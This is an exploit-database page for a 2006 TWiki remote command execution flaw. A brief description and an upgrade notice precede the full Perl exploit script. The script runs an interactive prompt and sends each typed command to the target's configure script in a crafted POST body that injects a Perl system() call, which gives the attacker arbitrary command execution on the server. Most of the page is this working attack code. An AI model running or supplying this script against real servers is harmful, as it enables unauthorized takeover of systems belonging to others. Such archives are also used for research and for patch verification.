header-logo
Suggest Exploit
vendor:
TWiki
by:
jolascoaga@514.es
9,3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: TWiki
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

TWiki Remote Command Execution Vulnerability

This exploit allows a remote attacker to execute arbitrary commands on a vulnerable TWiki installation. The vulnerability is due to a lack of sanitization of user-supplied input to the 'action' parameter of the 'configure' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request containing malicious commands to the vulnerable server. Successful exploitation of this vulnerability can result in the attacker gaining full control of the vulnerable server.

Mitigation:

Upgrade to the latest version of TWiki or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/perl 
# Tue Aug  1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1;   # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $options = GetOptions (
  'host=s'	      => \$host, 
  'dir=s'	      => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
		print "tinkiwinki> "; # phf haquerz style
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send {
    my ($cmd) = @_;
    my $ok	=	0;
    my $socket;
    LWP::Debug::level('+') if $debug; # but remember this is crap :D
    my $ua = new LWP::UserAgent();   
    $ua->agent("safari/zoo"); 
    if ($host !~ /^http/) {
	$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
    }
    my $req = HTTP::Request->new(POST => $host.$dir);
    $req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
    $ua->proxy(['http'] => $proxy) if $proxy;
    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    print $req->as_string() if $debug; 
    my $res = $ua->request($req);
    my $html = $res->content(); 
    $html =~ m/<body.*?>(.*?)<div/si; # <pus>
    print $1."\n";
    if ($debug) {
		open (DEBG, ">wikidebug");
		print DEBG $html;
    }
}
sub help {
    print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /twiki/bin/configure\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}
exit 0;
# <END OF EXPLOIT>

# milw0rm.com [2006-08-07]

Navigation

Suggest Exploit

Services By CQR